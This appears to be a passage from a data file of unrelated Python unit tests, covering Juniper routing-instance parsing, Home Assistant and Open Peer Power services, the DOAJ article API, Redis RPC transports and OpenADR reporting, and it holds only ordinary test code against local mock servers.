<irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n <instance-rib>\n <irib-name>mpls.0</irib-name>\n <irib-route-count>0</irib-route-count>\n <irib-active-count>0</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n <instance-rib>\n <irib-name>__mpls-oam__.mpls.0</irib-name>\n <irib-route-count>0</irib-route-count>\n <irib-active-count>0</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n <instance-rib>\n <irib-name>inet6.0</irib-name>\n <irib-route-count>5</irib-route-count>\n <irib-active-count>5</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n <instance-rib>\n <irib-name>inet6.1</irib-name>\n <irib-route-count>0</irib-route-count>\n <irib-active-count>0</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n <instance-rib>\n <irib-name>inet6.2</irib-name>\n <irib-route-count>0</irib-route-count>\n <irib-active-count>0</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n <instance-rib>\n <irib-name>inet6.3</irib-name>\n <irib-route-count>0</irib-route-count>\n <irib-active-count>0</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n <instance-rib>\n <irib-name>l2circuit.0</irib-name>\n <irib-route-count>0</irib-route-count>\n <irib-active-count>0</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n 
<irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n <instance-rib>\n <irib-name>mdt.0</irib-name>\n <irib-route-count>0</irib-route-count>\n <irib-active-count>0</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n <instance-rib>\n <irib-name>l2protection.0</irib-name>\n <irib-route-count>0</irib-route-count>\n <irib-active-count>0</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n <instance-rib>\n <irib-name>lsdist.0</irib-name>\n <irib-route-count>0</irib-route-count>\n <irib-active-count>0</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n <instance-rib>\n <irib-name>lsdist.1</irib-name>\n <irib-route-count>0</irib-route-count>\n <irib-active-count>0</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n <instance-rib>\n <irib-name>inetcolor.0</irib-name>\n <irib-route-count>0</irib-route-count>\n <irib-active-count>0</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n <instance-rib>\n <irib-name>inet6color.0</irib-name>\n <irib-route-count>0</irib-route-count>\n <irib-active-count>0</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n </instance-core>\n </instance-information>\n \"\"\"\n\n self.response[\"HA_SINGLE_INSTANCE_SUMMARY\"] = \"\"\"\n <instance-information xmlns=\"http://xml.juniper.net/junos/18.1I0/junos-routing\" junos:style=\"terse\">\n <instance-core>\n <instance-name>master</instance-name>\n <instance-type>forwarding</instance-type>\n <instance-rib>\n <irib-name>inet.0</irib-name>\n <irib-active-count>22</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n <instance-rib>\n <irib-name>inet6.0</irib-name>\n <irib-active-count>5</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n </instance-core>\n </instance-information>\n \"\"\"\n\n self.response[\"SA_INSTANCE_TEXT\"] = \"\"\"\nInstance Type\n Primary RIB Active/holddown/hidden\nmaster forwarding\n inet.0 18/0/0\n\n__juniper_private1__ forwarding\n __juniper_private1__.inet.0 6/0/0\n\n__juniper_private2__ forwarding\n __juniper_private2__.inet.0 0/0/1\n\n__juniper_private3__ forwarding\n\n__juniper_private4__ forwarding\n __juniper_private4__.inet.0 2/0/0\n\n__master.anon__ forwarding\n \"\"\"", "def testSimpleLoadTestWithSubscription(self):\n def sendRequestExpect200():\n response = requests.get(\"http://localhost:%d/weather/alice\" % self.port_number)\n self.assertEqual(response.status_code, 200)\n self.assertEqual(response.text, 'cloudy')\n # Subscribe Alice to weather updates so that messages\n # are persisted when posted.\n response = requests.post(\"http://localhost:%d/weather/alice\" % self.port_number, data='')\n self.assertEqual(response.status_code, 200)\n # Check that server stays up after multiple requests.\n self.runMultipleRequests(100, sendRequestExpect200)", "async def test_multiple_rpc_transports(loop, server, redis_server_b, consume_rpcs):\n registry.add(ApiA())\n registry.add(ApiB())\n\n manually_set_plugins(plugins={})\n\n redis_server_a = server\n\n port_a = 
redis_server_a.tcp_address.port\n port_b = redis_server_b.tcp_address.port\n\n logging.warning(f'Server A port: {port_a}')\n logging.warning(f'Server B port: {port_b}')\n\n config = Config.load_dict({\n 'bus': {\n 'schema': {\n 'transport': {'redis': {'url': f'redis://localhost:{port_a}'}},\n }\n },\n 'apis': {\n 'default': {\n 'rpc_transport': {'redis': {'url': f'redis://localhost:{port_a}'}},\n 'result_transport': {'redis': {'url': f'redis://localhost:{port_a}'}},\n },\n 'api_b': {\n 'rpc_transport': {'redis': {'url': f'redis://localhost:{port_b}'}},\n 'result_transport': {'redis': {'url': f'redis://localhost:{port_b}'}},\n },\n }\n })\n\n bus = BusNode(name='', parent=None, bus_client=lightbus.BusClient(config=config, loop=loop))\n asyncio.ensure_future(consume_rpcs(bus))\n await asyncio.sleep(0.1)\n\n await bus.api_a.rpc_a.call_async()\n await bus.api_b.rpc_b.call_async()", "def mock_all(aioclient_mock, request):\n aioclient_mock.post(\"http://127.0.0.1/openpeerpower/options\", json={\"result\": \"ok\"})\n aioclient_mock.get(\"http://127.0.0.1/supervisor/ping\", json={\"result\": \"ok\"})\n aioclient_mock.post(\"http://127.0.0.1/supervisor/options\", json={\"result\": \"ok\"})\n aioclient_mock.get(\n \"http://127.0.0.1/info\",\n json={\n \"result\": \"ok\",\n \"data\": {\"supervisor\": \"222\", \"openpeerpower\": \"0.110.0\", \"oppos\": None},\n },\n )\n aioclient_mock.get(\n \"http://127.0.0.1/store\",\n json={\n \"result\": \"ok\",\n \"data\": {\"addons\": [], \"repositories\": []},\n },\n )\n aioclient_mock.get(\n \"http://127.0.0.1/host/info\",\n json={\n \"result\": \"ok\",\n \"data\": {\n \"result\": \"ok\",\n \"data\": {\n \"coppis\": \"vm\",\n \"operating_system\": \"Debian GNU/Linux 10 (buster)\",\n \"kernel\": \"4.19.0-6-amd64\",\n },\n },\n },\n )\n aioclient_mock.get(\n \"http://127.0.0.1/core/info\",\n json={\"result\": \"ok\", \"data\": {\"version_latest\": \"1.0.0\"}},\n )\n aioclient_mock.get(\n \"http://127.0.0.1/os/info\",\n json={\"result\": \"ok\", \"data\": {\"version_latest\": \"1.0.0\"}},\n )\n aioclient_mock.get(\n \"http://127.0.0.1/supervisor/info\",\n json={\n \"result\": \"ok\",\n \"data\": {\"version_latest\": \"1.0.0\"},\n \"addons\": [\n {\n \"name\": \"test\",\n \"slug\": \"test\",\n \"installed\": True,\n \"update_available\": False,\n \"version\": \"1.0.0\",\n \"version_latest\": \"1.0.0\",\n \"repository\": \"core\",\n \"url\": \"https://github.com/openpeerpower/addons/test\",\n },\n {\n \"name\": \"test2\",\n \"slug\": \"test2\",\n \"installed\": True,\n \"update_available\": False,\n \"version\": \"1.0.0\",\n \"version_latest\": \"1.0.0\",\n \"repository\": \"core\",\n \"url\": \"https://github.com\",\n },\n ],\n },\n )\n aioclient_mock.get(\n \"http://127.0.0.1/ingress/panels\", json={\"result\": \"ok\", \"data\": {\"panels\": {}}}\n )", "async def test_api_call_service_with_data(\n hass: HomeAssistant, mock_api_client: TestClient\n) -> None:\n\n @ha.callback\n def listener(service_call):\n \"\"\"Record that our service got called.\n\n Also test if our data came through.\n \"\"\"\n hass.states.async_set(\n \"test.data\",\n \"on\",\n {\"data\": service_call.data[\"test\"]},\n context=service_call.context,\n )\n\n hass.services.async_register(\"test_domain\", \"test_service\", listener)\n\n resp = await mock_api_client.post(\n \"/api/services/test_domain/test_service\", json={\"test\": 1}\n )\n data = await resp.json()\n assert len(data) == 1\n state = data[0]\n assert state[\"entity_id\"] == \"test.data\"\n assert state[\"state\"] == \"on\"\n assert 
state[\"attributes\"] == {\"data\": 1}", "def testEndpoint(self):\n # Register an exporter\n context = self.framework.get_bundle_context()\n exporter = Exporter(context)\n context.register_service(pelix.remote.SERVICE_EXPORT_PROVIDER,\n exporter, {})\n\n # With no UID given\n status, _ = self._http_get(\"/endpoint\")\n\n # Check result\n self.assertEqual(status, 404)\n\n # Register a service\n svc_reg = context.register_service(\n \"sample.spec\", object(),\n {pelix.remote.PROP_EXPORTED_INTERFACES: \"*\"})\n\n # Get the endpoint bean\n endpoint = exporter.endpoints[-1]\n\n # Request the details of the endpoint\n status, response = self._http_get(\"/endpoint/{0}\".format(endpoint.uid))\n\n # Check result\n self.assertEqual(status, 200)\n\n # Check the content\n data = json.loads(response)\n for key, attr in (('uid', 'uid'), ('sender', 'framework'),\n ('name', 'name')):\n self.assertEqual(data[key], getattr(endpoint, attr))\n\n # Unregister it\n svc_reg.unregister()\n\n # Request the list of endpoints\n status, _ = self._http_get(\"/endpoint/{0}\".format(endpoint.uid))\n\n # Check result\n self.assertEqual(status, 404)", "def test_multiple_requests(self):\n s = self.api.session()\n s.request(\"1.2.3.4\", \"mozilla\", \"/foo/bar\").end()\n s.request(\"1.2.3.4\", \"mozilla\", \"/foo/blah\").end()\n s.end()\n data = self.connector.transcription()\n assert len(data) == 2\n assert data[0].get('action') == \"session_start\"\n assert data[1].get('action') == \"session_end\"", "def test_run_workflow_by_payload(self):\n full_task_payload = {\n \"workflow_name\" : \"workflow_name\",\n \"input_mappings\" : \"input_mappings\"\n}\n headers = { \n 'Accept': 'application/json',\n 'Content-Type': 'application/json',\n }\n response = self.client.open(\n '/run/workflow/',\n method='POST',\n headers=headers,\n data=json.dumps(full_task_payload),\n content_type='application/json')\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))", "async def test_create_vehicle_dispatch_route(client):\n create_dispatch_route_params = null\n params = [('access_token', 'access_token_example')]\n headers = { \n 'Accept': 'application/json',\n 'Content-Type': 'application/json',\n }\n response = await client.request(\n method='POST',\n path='/v1/fleet/vehicles/{vehicle_id}/dispatch/routes'.format(vehicle_id=56),\n headers=headers,\n json=create_dispatch_route_params,\n params=params,\n )\n assert response.status == 200, 'Response body is : ' + (await response.read()).decode('utf-8')", "async def test_service_refresh_devices_trigger_no_state_update(\n hass: HomeAssistant, aioclient_mock: AiohttpClientMocker\n) -> None:\n data = {\n \"sensors\": {\n \"1\": {\n \"name\": \"Switch 1\",\n \"type\": \"ZHASwitch\",\n \"state\": {\"buttonevent\": 1000},\n \"config\": {\"battery\": 100},\n \"uniqueid\": \"00:00:00:00:00:00:00:01-00\",\n }\n }\n }\n with patch.dict(DECONZ_WEB_REQUEST, data):\n config_entry = await setup_deconz_integration(hass, aioclient_mock)\n\n assert len(hass.states.async_all()) == 1\n\n captured_events = async_capture_events(hass, CONF_DECONZ_EVENT)\n\n aioclient_mock.clear_requests()\n\n data = {\n \"config\": {},\n \"groups\": {\n \"1\": {\n \"id\": \"Group 1 id\",\n \"name\": \"Group 1 name\",\n \"type\": \"LightGroup\",\n \"state\": {},\n \"action\": {},\n \"scenes\": [{\"id\": \"1\", \"name\": \"Scene 1\"}],\n \"lights\": [\"1\"],\n }\n },\n \"lights\": {\n \"1\": {\n \"name\": \"Light 1 name\",\n \"state\": {\"reachable\": True},\n \"type\": \"Light\",\n \"uniqueid\": 
\"00:00:00:00:00:00:00:01-00\",\n }\n },\n \"sensors\": {\n \"1\": {\n \"name\": \"Switch 1\",\n \"type\": \"ZHASwitch\",\n \"state\": {\"buttonevent\": 1000},\n \"config\": {\"battery\": 100},\n \"uniqueid\": \"00:00:00:00:00:00:00:01-00\",\n }\n },\n }\n\n mock_deconz_request(aioclient_mock, config_entry.data, data)\n\n await hass.services.async_call(\n DECONZ_DOMAIN, SERVICE_DEVICE_REFRESH, service_data={CONF_BRIDGE_ID: BRIDGEID}\n )\n await hass.async_block_till_done()\n\n assert len(hass.states.async_all()) == 5\n assert len(captured_events) == 0", "def test_06_test_via_endpoint(self):\n\n # set up all the bits we need\n dataset = []\n for i in range(10):\n data = ArticleFixtureFactory.make_incoming_api_article(doi=\"10.123/test/\" + str(i),\n fulltext=\"http://example.com/\" + str(i))\n dataset.append(data)\n\n # create the main account we're going to work as\n article_owner = models.Account()\n article_owner.set_id(\"test\")\n article_owner.set_name(\"Tester\")\n article_owner.set_email(\"[email protected]\")\n article_owner.generate_api_key()\n article_owner.add_role('publisher')\n article_owner.add_role('api')\n article_owner.save(blocking=True)\n\n # Add another user who doesn't own these articles\n somebody_else = models.Account()\n somebody_else.set_id(\"somebody_else\")\n somebody_else.set_name(\"Somebody Else\")\n somebody_else.set_email(\"[email protected]\")\n somebody_else.generate_api_key()\n somebody_else.add_role('publisher')\n somebody_else.add_role('api')\n somebody_else.save(blocking=True)\n\n assert article_owner.api_key != somebody_else.api_key\n\n # add a journal to the article owner account to create that link between account and articles\n journal = models.Journal(**JournalFixtureFactory.make_journal_source(in_doaj=True))\n journal.set_owner(article_owner.id)\n journal.save(blocking=True)\n\n with self.app_test.test_request_context():\n with self.app_test.test_client() as t_client:\n\n # Bulk create\n # The wrong owner can't create articles\n resp = t_client.post(url_for('api_v3.bulk_article_create', api_key=somebody_else.api_key),\n data=json.dumps(dataset))\n assert resp.status_code == 400, resp.status_code\n\n # Bulk create\n # redirected from v1\n # resp = t_client.post(url_for('api_v1.bulk_article_create', api_key=somebody_else.api_key),\n # data=json.dumps(dataset))\n # assert resp.status_code == 301, resp.status_code\n\n # But the correct owner can create articles\n resp = t_client.post(url_for('api_v3.bulk_article_create', api_key=article_owner.api_key),\n data=json.dumps(dataset))\n assert resp.status_code == 201\n reply = json.loads(resp.data.decode(\"utf-8\"))\n assert len(reply) == len(dataset)\n first_art = reply.pop()\n assert first_art['status'] == 'created'\n # Check we actually created new records\n time.sleep(1)\n assert len(models.Article.all()) == len(dataset)\n\n # Bulk delete\n all_but_one = [new_art['id'] for new_art in reply]\n resp = t_client.delete(url_for('api_v3.bulk_article_delete', api_key=article_owner.api_key),\n data=json.dumps(all_but_one))\n assert resp.status_code == 204\n time.sleep(1)\n # we should have deleted all but one of the articles.\n assert len(models.Article.all()) == 1\n # And our other user isn't allowed to delete the remaining one.\n resp = t_client.delete(url_for('api_v3.bulk_article_delete', api_key=somebody_else.api_key),\n data=json.dumps([first_art['id']]))\n assert resp.status_code == 400", "def test_list(self):\n response = self.client.get('/routines/')\n self.assertEqual(response.status_code, 
status.HTTP_200_OK)\n self.assertEqual(response.data['count'], 2)\n self.assertEqual(len(response.data['results']), 2)\n self.assertEqual(response.data['results'][0]['id'], self.rout1.id)", "def test_services(self):\n\n # Test turn_on\n turn_on_calls = mock_service(\n self.hass, remote.DOMAIN, SERVICE_TURN_ON)\n\n remote.turn_on(\n self.hass,\n entity_id='entity_id_val')\n\n self.hass.block_till_done()\n\n self.assertEqual(1, len(turn_on_calls))\n call = turn_on_calls[-1]\n\n self.assertEqual(remote.DOMAIN, call.domain)\n\n # Test turn_off\n turn_off_calls = mock_service(\n self.hass, remote.DOMAIN, SERVICE_TURN_OFF)\n\n remote.turn_off(\n self.hass, entity_id='entity_id_val')\n\n self.hass.block_till_done()\n\n self.assertEqual(1, len(turn_off_calls))\n call = turn_off_calls[-1]\n\n self.assertEqual(remote.DOMAIN, call.domain)\n self.assertEqual(SERVICE_TURN_OFF, call.service)\n self.assertEqual('entity_id_val', call.data[ATTR_ENTITY_ID])\n\n # Test sync\n sync_calls = mock_service(\n self.hass, remote.DOMAIN, SERVICE_SYNC)\n\n remote.sync(\n self.hass, entity_id='entity_id_val')\n\n self.hass.block_till_done()\n\n self.assertEqual(1, len(sync_calls))\n call = sync_calls[-1]\n\n self.assertEqual(remote.DOMAIN, call.domain)\n self.assertEqual(SERVICE_SYNC, call.service)\n self.assertEqual('entity_id_val', call.data[ATTR_ENTITY_ID])\n\n # Test send_command\n send_command_calls = mock_service(\n self.hass, remote.DOMAIN, SERVICE_SEND_COMMAND)\n\n remote.send_command(\n self.hass, entity_id='entity_id_val',\n device='test_device', command='test_command')\n\n self.hass.block_till_done()\n\n self.assertEqual(1, len(send_command_calls))\n call = send_command_calls[-1]\n\n self.assertEqual(remote.DOMAIN, call.domain)\n self.assertEqual(SERVICE_SEND_COMMAND, call.service)\n self.assertEqual('entity_id_val', call.data[ATTR_ENTITY_ID])", "def test_get_post_endpoints(self):\n self.addcontribgetrequest = self.factory.get(\n reverse(\"add_album_contrib\", kwargs={\"albumid\": self.testalbum.id}))\n self.addcontribgetrequest.user = self.u\n self.updateaccessgetrequest = self.factory.get(\n reverse(\"update_album_access\", kwargs={\"id\": self.testalbum.id}))\n self.updateaccessgetrequest.user = self.u\n self.addgroupgetrequest = self.factory.get(reverse(\"add_album_groups\", kwargs={\"albumid\":self.testalbum.id}))\n self.addgroupgetrequest.user = self.u\n\n self.assertRaises(Http404, album.add_contrib, self.addcontribgetrequest, self.testalbum.id)\n self.assertRaises(Http404, album.update_access_type, self.updateaccessgetrequest, self.testalbum.id)\n self.assertRaises(Http404, album.add_groups, self.addgroupgetrequest, self.testalbum.id)\n # todo: maybe make this a loop", "def test_run_add_group():\n gid = 123\n azure = create_azure_mock('GROUP1', [1, 2])\n data = [create_everbridge_contacts([], True)]\n insert_ids = [1, 2]\n insert_data = create_everbridge_contacts(insert_ids, False)\n inserted_data = [create_everbridge_contacts(insert_ids, True)]\n inserted_exids = ('&[email protected]&[email protected]')\n ever = create_everbridge_mock(data)\n ever.add_group = MagicMock(return_value={'id': 123})\n ever.get_group_id_by_name = MagicMock(return_value=None)\n ever.get_contacts_by_external_ids = MagicMock(side_effect=inserted_data)\n app = Synchronizer(azure, ever)\n # Call run\n rslt = app.run([gid])\n # Tests each method call\n azure.get_group_name.assert_called_with(gid)\n ever.get_group_id_by_name.assert_called_with('GROUP1')\n ever.add_group.assert_called_with('GROUP1', None)\n 
ever.delete_group.assert_not_called()\n ever.delete_members_from_group.assert_not_called()\n ever.delete_contacts.assert_not_called()\n ever.upsert_contacts.assert_called_with(insert_data)\n ever.get_contacts_by_external_ids.assert_called_with(inserted_exids)\n ever.add_members_to_group.assert_called_with(gid, insert_ids)\n assert rslt == {\n 'GROUP1': {\n 'azure_group_id': 123, 'everbridge_group_id': 123,\n 'azure_count': 2, 'everbridge_count': 0, 'error_contacts': 0,\n 'inserted_contacts': 2, 'updated_contacts': 0, 'removed_members': 0,\n 'deleted_contacts': 0, 'added_members': 2}\n }", "async def test_get_fleet_locations(client):\n group_param = {}\n params = [('access_token', 'access_token_example')]\n headers = { \n 'Accept': 'application/json',\n 'Content-Type': 'application/json',\n }\n response = await client.request(\n method='POST',\n path='/v1/fleet/locations',\n headers=headers,\n json=group_param,\n params=params,\n )\n assert response.status == 200, 'Response body is : ' + (await response.read()).decode('utf-8')", "async def test_device_registry_calls(opp):\n dev_reg = async_get(opp)\n supervisor_mock_data = {\n \"addons\": [\n {\n \"name\": \"test\",\n \"slug\": \"test\",\n \"installed\": True,\n \"update_available\": False,\n \"version\": \"1.0.0\",\n \"version_latest\": \"1.0.0\",\n \"repository\": \"test\",\n \"url\": \"https://github.com/openpeerpower/addons/test\",\n },\n {\n \"name\": \"test2\",\n \"slug\": \"test2\",\n \"installed\": True,\n \"update_available\": False,\n \"version\": \"1.0.0\",\n \"version_latest\": \"1.0.0\",\n \"url\": \"https://github.com\",\n },\n ]\n }\n os_mock_data = {\n \"board\": \"odroid-n2\",\n \"boot\": \"A\",\n \"update_available\": False,\n \"version\": \"5.12\",\n \"version_latest\": \"5.12\",\n }\n\n with patch.dict(os.environ, MOCK_ENVIRON), patch(\n \"openpeerpower.components.oppio.OppIO.get_supervisor_info\",\n return_value=supervisor_mock_data,\n ), patch(\n \"openpeerpower.components.oppio.OppIO.get_os_info\",\n return_value=os_mock_data,\n ):\n config_entry = MockConfigEntry(domain=DOMAIN, data={}, unique_id=DOMAIN)\n config_entry.add_to_opp(opp)\n assert await opp.config_entries.async_setup(config_entry.entry_id)\n await opp.async_block_till_done()\n assert len(dev_reg.devices) == 3\n\n supervisor_mock_data = {\n \"addons\": [\n {\n \"name\": \"test2\",\n \"slug\": \"test2\",\n \"installed\": True,\n \"update_available\": False,\n \"version\": \"1.0.0\",\n \"version_latest\": \"1.0.0\",\n \"url\": \"https://github.com\",\n },\n ]\n }\n\n # Test that when addon is removed, next update will remove the add-on and subsequent updates won't\n with patch(\n \"openpeerpower.components.oppio.OppIO.get_supervisor_info\",\n return_value=supervisor_mock_data,\n ), patch(\n \"openpeerpower.components.oppio.OppIO.get_os_info\",\n return_value=os_mock_data,\n ):\n async_fire_time_changed(opp, dt_util.now() + timedelta(hours=1))\n await opp.async_block_till_done()\n assert len(dev_reg.devices) == 2\n\n async_fire_time_changed(opp, dt_util.now() + timedelta(hours=2))\n await opp.async_block_till_done()\n assert len(dev_reg.devices) == 2\n\n supervisor_mock_data = {\n \"addons\": [\n {\n \"name\": \"test2\",\n \"slug\": \"test2\",\n \"installed\": True,\n \"update_available\": False,\n \"version\": \"1.0.0\",\n \"version_latest\": \"1.0.0\",\n \"url\": \"https://github.com\",\n },\n {\n \"name\": \"test3\",\n \"slug\": \"test3\",\n \"installed\": True,\n \"update_available\": False,\n \"version\": \"1.0.0\",\n \"version_latest\": \"1.0.0\",\n 
\"url\": \"https://github.com\",\n },\n ]\n }\n\n # Test that when addon is added, next update will reload the entry so we register\n # a new device\n with patch(\n \"openpeerpower.components.oppio.OppIO.get_supervisor_info\",\n return_value=supervisor_mock_data,\n ), patch(\n \"openpeerpower.components.oppio.OppIO.get_os_info\",\n return_value=os_mock_data,\n ):\n async_fire_time_changed(opp, dt_util.now() + timedelta(hours=3))\n await opp.async_block_till_done()\n assert len(dev_reg.devices) == 3", "def test_get_route_instance_entry(self, mock_execute_cli_command_on_device):\n mock_device_ins = mock.Mock()\n\n print(\"Get master instance info from HA topo\")\n mock_execute_cli_command_on_device.return_value = self.response[\"HA_SINGLE_INSTANCE\"]\n response = self.ins.get_route_instance_entry(device=mock_device_ins, name=\"master\")\n print(self.tool.pprint(response))\n self.assertIsInstance(response, (list, tuple))\n self.assertEqual(len(response), 2)\n\n print(\"Get all instance info from HA topo\")\n mock_execute_cli_command_on_device.return_value = self.response[\"HA_MULTI_INSTANCE\"]\n response = self.ins.get_route_instance_entry(device=mock_device_ins)\n print(self.tool.pprint(response))\n self.assertIsInstance(response, (list, tuple))\n self.assertEqual(len(response), 8)\n self.assertEqual(int(response[5][\"instance_rib_irib_active_count\"]), 2)\n\n print(\"Get brief all instance info from HA topo\")\n mock_execute_cli_command_on_device.return_value = self.response[\"HA_SINGLE_INSTANCE_BRIEF\"]\n response = self.ins.get_route_instance_entry(device=mock_device_ins)\n print(self.tool.pprint(response))\n self.assertIsInstance(response, (list, tuple))\n self.assertEqual(len(response), 2)\n self.assertEqual(int(response[0][\"instance_rib_irib_active_count\"]), 18)\n\n print(\"Get detail all instance info from HA topo\")\n mock_execute_cli_command_on_device.return_value = self.response[\"HA_SINGLE_INSTANCE_DETAIL\"]\n response = self.ins.get_route_instance_entry(device=mock_device_ins)\n print(self.tool.pprint(response))\n self.assertIsInstance(response, (list, tuple))\n self.assertEqual(len(response), 2)\n self.assertEqual(response[0][\"router_id\"], \"10.208.133.147\")\n\n print(\"Get extensive all instance info from HA topo\")\n mock_execute_cli_command_on_device.return_value = self.response[\"HA_SINGLE_INSTANCE_EXTENSIVE\"]\n response = self.ins.get_route_instance_entry(device=mock_device_ins)\n print(self.tool.pprint(response))\n self.assertIsInstance(response, (list, tuple))\n self.assertEqual(len(response), 18)\n self.assertEqual(response[17][\"instance_rib_irib_name\"], \"inet6color.0\")\n\n print(\"Get summary all instance info from HA topo\")\n mock_execute_cli_command_on_device.return_value = self.response[\"HA_SINGLE_INSTANCE_SUMMARY\"]\n response = self.ins.get_route_instance_entry(device=mock_device_ins)\n print(self.tool.pprint(response))\n self.assertIsInstance(response, (list, tuple))\n self.assertGreaterEqual(len(response), 1)\n\n print(\"Get route instance info by text and more options\")\n mock_execute_cli_command_on_device.return_value = self.response[\"SA_INSTANCE_TEXT\"]\n response = self.ins.get_route_instance_entry(device=mock_device_ins, return_mode=\"text\", more_options=\"summary\")\n print(self.tool.pprint(response))\n self.assertIsInstance(response, str)\n self.assertRegex(response, r\"__juniper_private1__.inet.0\")\n\n print(\"Invalid return_mode value\")\n mock_execute_cli_command_on_device.return_value = self.response[\"HA_SINGLE_INSTANCE_SUMMARY\"]\n 
self.assertRaisesRegex(\n ValueError,\n r\"'return_mode' must be 'ENTRY_LIST' or 'TEXT'\",\n self.ins.get_route_instance_entry,\n device=mock_device_ins, return_mode=\"Unknown\",\n )\n\n print(\"Cannot get response from device\")\n mock_execute_cli_command_on_device.return_value = False\n response = self.ins.get_route_instance_entry(device=mock_device_ins, more_options=\"summary\")\n self.assertFalse(response)", "def test_api_new_game(self):\n\n with self.client as client:\n ...\n # write a test for this route", "async def test_update_reports():\n # Create a server\n logger = logging.getLogger('openleadr')\n logger.setLevel(logging.DEBUG)\n loop = asyncio.get_event_loop()\n server = OpenADRServer(vtn_id='testvtn')\n\n register_report_future_1 = loop.create_future()\n register_report_future_2 = loop.create_future()\n register_report_futures = [register_report_future_1, register_report_future_2]\n\n receive_report_future_1 = loop.create_future()\n receive_report_future_2 = loop.create_future()\n receive_report_future_3 = loop.create_future()\n receive_report_future_4 = loop.create_future()\n receive_report_futures = [receive_report_future_1, receive_report_future_2, receive_report_future_3, receive_report_future_4]\n server.add_handler('on_register_report', partial(on_register_report, futures=register_report_futures, receive_futures=receive_report_futures))\n\n party_future = loop.create_future()\n server.add_handler('on_create_party_registration', partial(on_create_party_registration, future=party_future))\n\n # Create a client\n client = OpenADRClient(ven_name='myven', vtn_url='http://localhost:8080/OpenADR2/Simple/2.0b')\n\n # Add 4 reports\n future_1 = loop.create_future()\n client.add_report(callback=partial(collect_data, future=future_1),\n report_specifier_id='PowerReport',\n resource_id='Device001',\n measurement='power_real',\n sampling_rate=timedelta(seconds=2),\n unit='W')\n future_2 = loop.create_future()\n client.add_report(callback=partial(collect_data, future=future_2),\n report_specifier_id='PowerReport',\n resource_id='Device002',\n measurement='power_real',\n sampling_rate=timedelta(seconds=2),\n unit='W')\n future_3 = loop.create_future()\n client.add_report(callback=partial(collect_data, future=future_3),\n report_specifier_id='VoltageReport',\n resource_id='Device001',\n measurement='voltage',\n sampling_rate=timedelta(seconds=2),\n unit='V')\n future_4 = loop.create_future()\n client.add_report(callback=partial(collect_data, future=future_4),\n report_specifier_id='VoltageReport',\n resource_id='Device002',\n measurement='voltage',\n sampling_rate=timedelta(seconds=2),\n unit='V')\n\n assert len(client.reports) == 2\n asyncio.create_task(server.run_async())\n # await asyncio.sleep(1)\n\n # Run the client asynchronously\n print(\"Running the client\")\n asyncio.create_task(client.run())\n\n print(\"Awaiting party future\")\n await party_future\n\n print(\"Awaiting report futures\")\n await asyncio.gather(register_report_future_1, register_report_future_2)\n await asyncio.sleep(0.1)\n assert len(server.services['report_service'].report_callbacks) == 4\n\n print(\"Awaiting data collection futures\")\n await future_1\n await future_2\n await future_3\n await future_4\n\n print(\"Awaiting update report futures\")\n await asyncio.gather(receive_report_future_1, receive_report_future_2, receive_report_future_3, receive_report_future_4)\n print(\"Done gathering\")\n\n assert receive_report_future_1.result()[0][1] == future_1.result()\n assert 
receive_report_future_2.result()[0][1] == future_2.result()\n assert receive_report_future_3.result()[0][1] == future_3.result()\n assert receive_report_future_4.result()[0][1] == future_4.result()\n\n await client.stop()\n await server.stop()", "def testListEndpoints(self):\n # Register an exporter\n context = self.framework.get_bundle_context()\n exporter = Exporter(context)\n context.register_service(pelix.remote.SERVICE_EXPORT_PROVIDER,\n exporter, {})\n\n # Empty list\n status, response = self._http_get(\"/endpoints\")\n\n # Check result\n self.assertEqual(status, 200)\n self.assertListEqual(json.loads(response), [])\n\n # Register some endpoints\n svc_regs = []\n for _ in range(3):\n # Register a service\n svc_regs.append(\n context.register_service(\n \"sample.spec\", object(),\n {pelix.remote.PROP_EXPORTED_INTERFACES: \"*\"}))\n\n # Request the list of endpoints\n status, response = self._http_get(\"/endpoints\")\n\n # Check result\n self.assertEqual(status, 200)\n\n # Get all endpoints ID\n data = json.loads(response)\n local_uids = [endpoint.uid for endpoint in exporter.endpoints]\n servlet_uids = [item['uid'] for item in data]\n\n self.assertCountEqual(servlet_uids, local_uids)\n\n # Unregister them\n for svc_reg in svc_regs:\n # Unregister the service\n svc_reg.unregister()\n\n # Request the list of endpoints\n status, response = self._http_get(\"/endpoints\")\n\n # Check result\n self.assertEqual(status, 200)\n\n # Get all endpoints ID\n data = json.loads(response)\n local_uids = [endpoint.uid for endpoint in exporter.endpoints]\n servlet_uids = [item['uid'] for item in data]\n\n self.assertCountEqual(servlet_uids, local_uids)", "async def test_form_multiple_services(hass: HomeAssistant) -> None:\n result = await hass.config_entries.flow.async_init(\n DOMAIN, context={\"source\": 